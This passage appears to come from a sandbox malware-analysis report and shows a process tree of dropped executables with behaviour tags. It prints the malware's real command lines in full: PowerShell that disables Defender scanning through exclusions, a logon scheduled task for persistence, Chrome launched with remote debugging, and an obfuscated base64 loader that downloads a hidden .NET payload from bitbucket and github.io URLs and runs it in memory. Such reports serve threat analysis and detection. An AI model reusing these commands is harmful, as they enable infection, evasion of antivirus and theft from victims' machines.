                                                                                                                                                              "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\3UIvN0mq\Anubis.exe""
                                                                                                                                                              7⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:6704
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10131400101\esFK2gm.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10131400101\esFK2gm.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2516
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10131410101\mIrI3a9.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10131410101\mIrI3a9.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:3900
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
                                                                                                                                                              7⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:864
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\a.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\a.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2376
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10131421121\skf7iF4.cmd"
                                                                                                                                                            6⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:4328
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10131421121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
                                                                                                                                                              7⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              PID:2608
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10131421121\skf7iF4.cmd" sgcCUaUFtA
                                                                                                                                                                8⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:2968
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
                                                                                                                                                                  9⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:1148
                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                    "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
                                                                                                                                                                    10⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:2844
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10131430101\packed.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10131430101\packed.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                            PID:7864
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                                                                                                                                                              7⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:4848
                                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "COM Surrogate Task" /tr "C:\Program Files\runtime\COM Surrogate.exe" /sc onlogon /rl HIGHEST /f
                                                                                                                                                              7⤵
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2588
                                                                                                                                                            • C:\Program Files\runtime\COM Surrogate.exe
                                                                                                                                                              "C:\Program Files\runtime\COM Surrogate.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                              PID:6928
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10131440101\mAtJWNv.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10131440101\mAtJWNv.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:7536
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10131440101\mAtJWNv.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10131440101\mAtJWNv.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              PID:1928
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                8⤵
                                                                                                                                                                • Uses browser remote debugging
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                PID:5040
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffe603fcc40,0x7ffe603fcc4c,0x7ffe603fcc58
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:6092
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,18106717053384088145,10726106963801237922,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1944 /prefetch:2
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:6484
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2196,i,18106717053384088145,10726106963801237922,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2208 /prefetch:3
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:1148
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,18106717053384088145,10726106963801237922,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2316 /prefetch:8
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:688
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,18106717053384088145,10726106963801237922,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:1
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Uses browser remote debugging
                                                                                                                                                                          PID:1448
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,18106717053384088145,10726106963801237922,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3288 /prefetch:1
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Uses browser remote debugging
                                                                                                                                                                          PID:2728
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7536 -s 944
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:6640
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10131450101\FvbuInU.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10131450101\FvbuInU.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:7768
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10131460101\pwHxMTy.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10131460101\pwHxMTy.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:7932
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10131460101\pwHxMTy.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10131460101\pwHxMTy.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:7884
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7932 -s 960
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:7888
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10131470101\CgmaT61.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10131470101\CgmaT61.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:5608
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10131480101\v6Oqdnc.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10131480101\v6Oqdnc.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:2484
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10131490101\pered.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10131490101\pered.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    PID:7288
                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                      cmd.exe /c 67cb736da8518.vbs
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:548
                                                                                                                                                                      • C:\Windows\System32\WScript.exe
                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cb736da8518.vbs"
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        PID:7444
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBj@FM@bgBT@GM@bgBo@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:1052
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.cSnScnh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                                                                                            10⤵
                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:1576
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10131500101\zY9sqWs.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10131500101\zY9sqWs.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:2240
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10131510101\2qv26zF.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10131510101\2qv26zF.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:7536
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10131520101\sqVWjvh.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10131520101\sqVWjvh.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:4960
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10131530101\PQkVDtx.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10131530101\PQkVDtx.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:3220
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:6096
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2N2602.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2N2602.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
